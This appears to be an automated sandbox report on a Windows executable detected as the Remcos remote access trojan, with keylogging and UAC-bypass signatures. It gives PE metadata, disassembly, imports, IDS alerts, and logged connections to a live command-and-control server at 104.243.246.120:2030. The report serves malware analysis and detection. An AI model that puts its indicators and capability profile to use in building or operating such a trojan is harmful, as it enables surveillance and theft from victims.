                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x6724916B [Fri Nov 1 08:29:31 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:e77512f955eaf60ccff45e02d69234de

                            Entrypoint Preview

                            Instruction
                            call 00007EFF70C2FFF3h
                            jmp 00007EFF70C2F94Fh
                            push ebp
                            mov ebp, esp
                            sub esp, 00000324h
                            push ebx
                            push 00000017h
                            call 00007EFF70C51E29h
                            test eax, eax
                            je 00007EFF70C2FAD7h
                            mov ecx, dword ptr [ebp+08h]
                            int 29h
                            push 00000003h
                            call 00007EFF70C2FC94h
                            mov dword ptr [esp], 000002CCh
                            lea eax, dword ptr [ebp-00000324h]
                            push 00000000h
                            push eax
                            call 00007EFF70C31FABh
                            add esp, 0Ch
                            mov dword ptr [ebp-00000274h], eax
                            mov dword ptr [ebp-00000278h], ecx
                            mov dword ptr [ebp-0000027Ch], edx
                            mov dword ptr [ebp-00000280h], ebx
                            mov dword ptr [ebp-00000284h], esi
                            mov dword ptr [ebp-00000288h], edi
                            mov word ptr [ebp-0000025Ch], ss
                            mov word ptr [ebp-00000268h], cs
                            mov word ptr [ebp-0000028Ch], ds
                            mov word ptr [ebp-00000290h], es
                            mov word ptr [ebp-00000294h], fs
                            mov word ptr [ebp-00000298h], gs
                            pushfd
                            pop dword ptr [ebp-00000264h]
                            mov eax, dword ptr [ebp+04h]
                            mov dword ptr [ebp-0000026Ch], eax
                            lea eax, dword ptr [ebp+04h]
                            mov dword ptr [ebp-00000260h], eax
                            mov dword ptr [ebp-00000324h], 00010001h
                            mov eax, dword ptr [eax-04h]
                            push 00000050h
                            mov dword ptr [ebp-00000270h], eax
                            lea eax, dword ptr [ebp-58h]
                            push 00000000h
                            push eax
                            call 00007EFF70C31F21h

                            Rich Headers

                            Programming Language:
                            • [C++] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0200x104.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x4af8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b0000x3b80.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x6c5100x38.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x6c5e80x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6c5480x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x570000x4f4.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x55f1d0x5600030cda225e02a0d4dab478a6c7c094860False0.5738610555959303data6.62127843313247IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x570000x18b000x18c009800e1a5325bb58aa054e318c8bb055aFalse0.49812578914141414OpenPGP Secret Key Version 65.758930104385571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x700000x5d6c0xe0006414e748130e7e668ba2ba172d63448False0.22684151785714285data3.093339598098017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x760000x4af80x4c00268090dc0722e44a1d7d2c85bbe2d2dbFalse0.2793996710526316data3.987098222533729IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x7b0000x3b800x3c003a880743591ae3410d0dc26d7322ddd0False0.7569661458333333data6.695050823503309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x7618c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                            RT_ICON0x765f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                            RT_ICON0x76f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                            RT_ICON0x780240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                            RT_RCDATA0x7a5cc0x4eadata1.0087440381558028
                            RT_GROUP_ICON0x7aab80x3edataEnglishUnited States0.8064516129032258

                            Imports

                            DLLImport
                            KERNEL32.dllExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
                            USER32.dllDefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
                            GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
                            ADVAPI32.dllLookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
                            SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                            ole32.dllCoInitializeEx, CoGetObject, CoUninitialize
                            SHLWAPI.dllStrToIntA, PathFileExistsW, PathFileExistsA
                            WINMM.dllmciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
                            WS2_32.dllsend, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
                            urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                            gdiplus.dllGdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
                            WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-06T14:11:10.451566+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650002104.243.246.1202030TCP
                            2024-12-06T14:11:40.154154+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649731104.243.246.1202030TCP
                            2024-12-06T14:12:03.185927+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649792104.243.246.1202030TCP
                            2024-12-06T14:12:26.201641+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649844104.243.246.1202030TCP
                            2024-12-06T14:12:49.249157+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649900104.243.246.1202030TCP
                            2024-12-06T14:13:12.280515+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649953104.243.246.1202030TCP
                            2024-12-06T14:13:35.315155+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649995104.243.246.1202030TCP
                            2024-12-06T14:13:58.359734+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649996104.243.246.1202030TCP
                            2024-12-06T14:14:21.406877+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649998104.243.246.1202030TCP
                            2024-12-06T14:14:44.439475+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649999104.243.246.1202030TCP
                            2024-12-06T14:15:07.501287+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.650001104.243.246.1202030TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 6, 2024 14:11:18.112397909 CET497312030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:18.232120037 CET203049731104.243.246.120192.168.2.6
                            Dec 6, 2024 14:11:18.232254028 CET497312030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:18.238980055 CET497312030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:18.359457970 CET203049731104.243.246.120192.168.2.6
                            Dec 6, 2024 14:11:40.154031038 CET203049731104.243.246.120192.168.2.6
                            Dec 6, 2024 14:11:40.154154062 CET497312030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:40.154295921 CET497312030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:40.273987055 CET203049731104.243.246.120192.168.2.6
                            Dec 6, 2024 14:11:41.167937994 CET497922030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:41.287806034 CET203049792104.243.246.120192.168.2.6
                            Dec 6, 2024 14:11:41.287990093 CET497922030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:41.291743040 CET497922030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:11:41.411520004 CET203049792104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:03.185812950 CET203049792104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:03.185926914 CET497922030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:03.186036110 CET497922030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:03.305752039 CET203049792104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:04.198139906 CET498442030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:04.318192005 CET203049844104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:04.318341970 CET498442030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:04.322211981 CET498442030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:04.442943096 CET203049844104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:26.201550007 CET203049844104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:26.201641083 CET498442030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:26.201704025 CET498442030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:26.321434021 CET203049844104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:27.214210987 CET499002030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:27.334284067 CET203049900104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:27.339510918 CET499002030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:27.343054056 CET499002030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:27.462800980 CET203049900104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:49.249105930 CET203049900104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:49.249156952 CET499002030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:49.249226093 CET499002030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:49.369544029 CET203049900104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:50.261045933 CET499532030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:50.380913019 CET203049953104.243.246.120192.168.2.6
                            Dec 6, 2024 14:12:50.381133080 CET499532030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:50.384814024 CET499532030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:12:50.504900932 CET203049953104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:12.280420065 CET203049953104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:12.280514956 CET499532030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:12.280548096 CET499532030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:12.400779963 CET203049953104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:13.291778088 CET499952030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:13.411799908 CET203049995104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:13.412008047 CET499952030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:13.415560007 CET499952030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:13.535326004 CET203049995104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:35.314971924 CET203049995104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:35.315155029 CET499952030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:35.315414906 CET499952030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:35.435136080 CET203049995104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:36.331459999 CET499962030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:36.451451063 CET203049996104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:36.451533079 CET499962030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:36.454936028 CET499962030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:36.574681044 CET203049996104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:58.359661102 CET203049996104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:58.359734058 CET499962030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:58.359827042 CET499962030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:58.479769945 CET203049996104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:59.369754076 CET499982030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:59.490211964 CET203049998104.243.246.120192.168.2.6
                            Dec 6, 2024 14:13:59.490367889 CET499982030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:59.493748903 CET499982030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:13:59.613567114 CET203049998104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:21.406780958 CET203049998104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:21.406877041 CET499982030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:21.406960964 CET499982030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:21.526964903 CET203049998104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:22.417809963 CET499992030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:22.537770033 CET203049999104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:22.537856102 CET499992030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:22.542993069 CET499992030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:22.662717104 CET203049999104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:44.438077927 CET203049999104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:44.439475060 CET499992030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:44.439532995 CET499992030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:44.559504986 CET203049999104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:45.460443020 CET500012030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:45.580794096 CET203050001104.243.246.120192.168.2.6
                            Dec 6, 2024 14:14:45.580873013 CET500012030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:45.584673882 CET500012030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:14:45.704428911 CET203050001104.243.246.120192.168.2.6
                            Dec 6, 2024 14:15:07.501202106 CET203050001104.243.246.120192.168.2.6
                            Dec 6, 2024 14:15:07.501286983 CET500012030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:15:07.501383066 CET500012030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:15:07.621804953 CET203050001104.243.246.120192.168.2.6
                            Dec 6, 2024 14:15:08.510446072 CET500022030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:15:08.630511045 CET203050002104.243.246.120192.168.2.6
                            Dec 6, 2024 14:15:08.630620956 CET500022030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:15:08.635371923 CET500022030192.168.2.6104.243.246.120
                            Dec 6, 2024 14:15:08.755263090 CET203050002104.243.246.120192.168.2.6

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:1
                            Start time:08:11:17
                            Start date:06/12/2024
                            Path:C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe"
                            Imagebase:0x400000
                            File size:493'056 bytes
                            MD5 hash:68011A26BB98D3B77DE9594AE7624358
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:26.2%
                              Total number of Nodes:1073
                              Total number of Limit Nodes:62
                              execution_graph 45955 41d4d0 45957 41d4e6 _Yarn ___scrt_fastfail 45955->45957 45956 41d6e3 45961 41d734 45956->45961 45971 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 45956->45971 45957->45956 45959 431f99 21 API calls 45957->45959 45963 41d696 ___scrt_fastfail 45959->45963 45960 41d6f4 45960->45961 45962 41d760 45960->45962 45972 431f99 45960->45972 45962->45961 45980 41d474 21 API calls ___scrt_fastfail 45962->45980 45963->45961 45965 431f99 21 API calls 45963->45965 45969 41d6be ___scrt_fastfail 45965->45969 45967 41d72d ___scrt_fastfail 45967->45961 45977 43264f 45967->45977 45969->45961 45970 431f99 21 API calls 45969->45970 45970->45956 45971->45960 45973 431fa3 45972->45973 45974 431fa7 45972->45974 45973->45967 45981 43a88c 45974->45981 45990 43256f 45977->45990 45979 432657 45979->45962 45980->45961 45987 446aff _strftime 45981->45987 45982 446b3d 45989 445354 20 API calls _abort 45982->45989 45983 446b28 RtlAllocateHeap 45985 431fac 45983->45985 45983->45987 45985->45967 45987->45982 45987->45983 45988 442200 7 API calls 2 library calls 45987->45988 45988->45987 45989->45985 45991 432588 45990->45991 45995 43257e 45990->45995 45992 431f99 21 API calls 45991->45992 45991->45995 45993 4325a9 45992->45993 45993->45995 45996 43293a CryptAcquireContextA 45993->45996 45995->45979 45997 432956 45996->45997 45998 43295b CryptGenRandom 45996->45998 45997->45995 45998->45997 45999 432970 CryptReleaseContext 45998->45999 45999->45997 46000 426030 46005 4260f7 recv 46000->46005 46006 44e8b6 46007 44e8c1 46006->46007 46008 44e8e9 46007->46008 46009 44e8da 46007->46009 46010 44e8f8 46008->46010 46028 455573 27 API calls 2 library calls 46008->46028 46027 445354 20 API calls _abort 46009->46027 46015 44b9be 46010->46015 46013 44e8df ___scrt_fastfail 46016 44b9d6 46015->46016 46017 44b9cb 46015->46017 46019 44b9de 46016->46019 46025 44b9e7 _strftime 46016->46025 46029 446aff 46017->46029 46036 446ac5 20 API calls __dosmaperr 46019->46036 46020 44ba11 RtlReAllocateHeap 46024 44b9d3 46020->46024 46020->46025 46021 44b9ec 46037 445354 20 API calls _abort 46021->46037 46024->46013 46025->46020 46025->46021 46038 442200 7 API calls 2 library calls 46025->46038 46027->46013 46028->46010 46030 446b3d 46029->46030 46031 446b0d _strftime 46029->46031 46040 445354 20 API calls _abort 46030->46040 46031->46030 46032 446b28 RtlAllocateHeap 46031->46032 46039 442200 7 API calls 2 library calls 46031->46039 46032->46031 46034 446b3b 46032->46034 46034->46024 46036->46024 46037->46024 46038->46025 46039->46031 46040->46034 46041 426091 46046 42610e send 46041->46046 46047 425e56 46048 425e6b 46047->46048 46051 425f0b 46047->46051 46049 425f25 46048->46049 46050 425f5a 46048->46050 46048->46051 46052 425eb9 46048->46052 46053 425f77 46048->46053 46054 425f9e 46048->46054 46061 425eee 46048->46061 46063 424354 46048->46063 46049->46050 46049->46051 46072 41f075 53 API calls 46049->46072 46050->46053 46073 424b7b 21 API calls 46050->46073 46052->46051 46052->46061 46071 41f075 53 API calls 46052->46071 46053->46051 46053->46054 46074 424f78 50 API calls ___scrt_fastfail 46053->46074 46054->46051 46075 4255c7 28 API calls 46054->46075 46061->46049 46061->46051 46062 424354 50 API calls 46061->46062 46062->46049 46064 42436d 46063->46064 46070 424362 _Yarn 46063->46070 46076 422d43 46064->46076 46066 424399 46066->46070 46090 41e097 21 API calls 46066->46090 46068 4243bf 46068->46070 46091 43265b CryptAcquireContextA CryptGenRandom CryptReleaseContext 46068->46091 46070->46052 46071->46052 46072->46049 46073->46053 46074->46054 46075->46051 46077 422d58 46076->46077 46081 422d82 46076->46081 46077->46081 46092 422c5d 46077->46092 46078 422dd5 46089 422e4e 46078->46089 46111 421d0b 21 API calls 46078->46111 46081->46078 46081->46089 46110 42172d 21 API calls 46081->46110 46082 422deb 46082->46089 46112 4219ef 21 API calls 46082->46112 46085 422e10 46087 422e2c 46085->46087 46085->46089 46113 421ddf 21 API calls 46085->46113 46087->46089 46114 4227b1 50 API calls 46087->46114 46089->46066 46090->46068 46091->46070 46093 422cb5 46092->46093 46096 422c70 46092->46096 46115 4216bc 46093->46115 46095 422cc0 46097 422cae 46095->46097 46099 4216bc 21 API calls 46095->46099 46096->46097 46098 4216bc 21 API calls 46096->46098 46097->46081 46098->46096 46100 422cd3 46099->46100 46100->46097 46101 4216bc 21 API calls 46100->46101 46102 422ce3 46101->46102 46102->46097 46103 4216bc 21 API calls 46102->46103 46104 422cf3 46103->46104 46104->46097 46105 4216bc 21 API calls 46104->46105 46106 422d03 46105->46106 46106->46097 46107 4216bc 21 API calls 46106->46107 46108 422d13 46107->46108 46108->46097 46109 4216bc 21 API calls 46108->46109 46109->46097 46110->46078 46111->46082 46112->46085 46113->46087 46114->46089 46116 4216d5 46115->46116 46123 4216ce 46115->46123 46117 4216e6 46116->46117 46118 421719 46116->46118 46124 421411 21 API calls 46117->46124 46126 421487 21 API calls 46118->46126 46121 4216ee 46121->46123 46125 421353 21 API calls 46121->46125 46123->46095 46124->46121 46125->46123 46126->46123 46127 4429fc 46128 442a05 46127->46128 46133 442a1e 46127->46133 46129 442a0d 46128->46129 46134 442a84 46128->46134 46131 442a15 46131->46129 46145 442d51 22 API calls 2 library calls 46131->46145 46135 442a90 46134->46135 46136 442a8d 46134->46136 46146 44e1be GetEnvironmentStringsW 46135->46146 46136->46131 46139 442a9d 46155 446ac5 20 API calls __dosmaperr 46139->46155 46142 442ad2 46142->46131 46144 442aa8 46154 446ac5 20 API calls __dosmaperr 46144->46154 46145->46133 46147 442a97 46146->46147 46148 44e1d2 46146->46148 46147->46139 46153 442ba9 26 API calls 3 library calls 46147->46153 46149 446aff _strftime 21 API calls 46148->46149 46150 44e1e6 _Yarn 46149->46150 46156 446ac5 20 API calls __dosmaperr 46150->46156 46152 44e200 FreeEnvironmentStringsW 46152->46147 46153->46144 46154->46139 46155->46142 46156->46152 46157 43a998 46159 43a9a4 _swprintf ___BuildCatchObject 46157->46159 46158 43a9b2 46175 445354 20 API calls _abort 46158->46175 46159->46158 46163 43a9dc 46159->46163 